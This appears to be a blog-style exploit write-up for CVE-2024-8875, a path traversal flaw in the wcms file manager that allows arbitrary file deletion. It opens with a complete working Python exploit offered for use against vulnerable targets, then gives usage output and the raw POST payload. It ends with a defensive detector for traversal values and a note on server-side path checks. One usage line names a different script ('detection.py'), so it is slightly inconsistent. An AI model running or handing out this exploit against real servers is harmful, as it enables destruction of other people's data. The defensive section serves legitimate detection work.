Novel Exploit — Arbitrary File Deletion in WCMS (CVE-2024-8875)
Summary
In this post, we will explore an arbitrary file deletion vulnerability in wcms (CVE-2024-8875). We will walk through how the exploit works and use the novel exploit against vulnerable targets to delete files of our choosing (if the process permissions allow).
```python
import argparse

import requests
import urllib3

# Disable SSL verification warning for simplicity
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)


def validate_url(url):
    # Only http:// and https:// targets are accepted.
    if not url.startswith("http://") and not url.startswith("https://"):
        raise ValueError("Invalid URL schema. Use 'http://' or 'https://'.")


def exploit(url, path):
    session = requests.Session()
    # The GET request obtains the session id (PHPSESSID) for this session.
    session.get(f"{url}/wcms/wex/finder.php?p=", timeout=10, verify=False)
    try:
        # The POST is sent in the same session. "p" is empty, matching the
        # payload this post describes. Redirects are not followed so that the
        # 302 response can be observed.
        response = session.post(f"{url}/wcms/wex/finder.php?p=",
                                data={
                                    "p": "",
                                    "group": "1",
                                    "file[]": path,
                                    "delete": "Delete"
                                }, timeout=5, verify=False,
                                allow_redirects=False)
        if response.status_code == 302:
            print("[*] Specified file has been deleted (if the path was correct) "
                  "and the target was vulnerable to CVE-2024-8875.")
            return
    except requests.RequestException as e:
        print(f"[-] LOG: An error occurred during the exploitation: {e}")
    print("[-] The wcms instance seems NOT to be vulnerable to CVE-2024-8875.")


def main():
    parser = argparse.ArgumentParser(description="Novel exploit for CVE-2024-8875.")
    parser.add_argument("--url", required=True, help="URL to send requests to.")
    parser.add_argument("--path", required=True,
                        help="File to be deleted (e.g. ../../path/to/file).")
    args = parser.parse_args()
    validate_url(args.url)
    exploit(args.url.rstrip("/"), args.path)


if __name__ == "__main__":
    main()
```
Description
Introduction
A vulnerability classified as critical was found in vedees wcms up to 0.3.2. Affected by this vulnerability is an unknown functionality of the file /wex/finder.php. The manipulation of the argument p leads to path traversal. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.
Reference: https://nvd.nist.gov/vuln/detail/CVE-2024-8875
Exploitation Script Usage
```
kali@kali:/tmp$ python3 exploit.py -h
usage: exploit.py [-h] --url URL --path PATH
Novel exploit for CVE-2024-8875.
options:
-h, --help show this help message and exit
--url URL URL to send requests to.
--path PATH File to be deleted (e.g. ../../path/to/file).
kali@kali:/tmp$
```
Exploiting Vulnerable Targets
```
python3 detection.py --url http://vuln.wcms.local
```
Understanding exploitation script
The exploitation script works as follows:
- Read user input (the URL to target and the path to the file to be deleted).
- The supplied URL is then validated.
- If the URL is valid, it is passed to the `exploit()` function along with the path to the file to be deleted.
- Next, a GET request is sent to the target to get the session id (PHPSESSID).
- Next, a POST request to delete a file is sent to the target (in the same HTTP request session).
- The following payload is sent in the POST request: `p=&group=1&file%5B%5D=PATH_OF_FILE_TO_BE_DELETED&delete=Delete`.
- The `file[]` parameter contains the path of the file to be deleted.
- If the target is vulnerable, the provided file is deleted from the server and it can be verified by checking the server files.
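
A defender-side check for the request described above, as an added example that is not part of the original post or of wcms: it flags `finder.php` delete requests whose `file[]` values are absolute or climb above their starting directory. It assumes request bodies are available to the detector (for instance from a WAF or reverse-proxy body log); the function names and the sample requests are constructed for illustration.

```python
from urllib.parse import parse_qs, unquote, urlsplit

ENDPOINT_SUFFIX = "/wex/finder.php"  # endpoint named in the advisory text


def escapes_base(value: str) -> bool:
    """True if a file[] value is absolute or climbs above its starting directory."""
    # Decode repeatedly so double-encoded sequences (%252e%252e%252f) are caught.
    for _ in range(3):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    value = value.replace("\\", "/")
    if value.startswith("/") or "\x00" in value:
        return True
    depth = 0
    for segment in value.split("/"):
        if segment in ("", "."):
            continue
        depth += -1 if segment == ".." else 1
        if depth < 0:  # walked above the directory the path started in
            return True
    return False


def flag_request(method: str, url: str, body: str) -> list[str]:
    """Return the suspicious file[] values of a finder.php delete request."""
    if method.upper() != "POST" or not urlsplit(url).path.endswith(ENDPOINT_SUFFIX):
        return []
    form = parse_qs(body, keep_blank_values=True)
    if "delete" not in form:
        return []
    return [v for v in form.get("file[]", []) if escapes_base(v)]


# Constructed sample requests (method, URL, form body); not real traffic.
SAMPLE = [
    ("POST", "/wcms/wex/finder.php?p=", "p=&group=1&file%5B%5D=notes.txt&delete=Delete"),
    ("POST", "/wcms/wex/finder.php?p=", "p=&group=1&file%5B%5D=..%2F..%2Fexample.txt&delete=Delete"),
    ("POST", "/wcms/wex/finder.php?p=", "p=&group=1&file%5B%5D=%252e%252e%252fexample.txt&delete=Delete"),
    ("GET", "/wcms/wex/finder.php?p=", ""),
]

if __name__ == "__main__":
    for method, url, body in SAMPLE:
        hits = flag_request(method, url, body)
        print("ALERT" if hits else "ok   ", method, url, hits)
```

The same containment test belongs server-side as well: resolve the requested path to its canonical form and refuse the delete unless the result is still inside the managed directory.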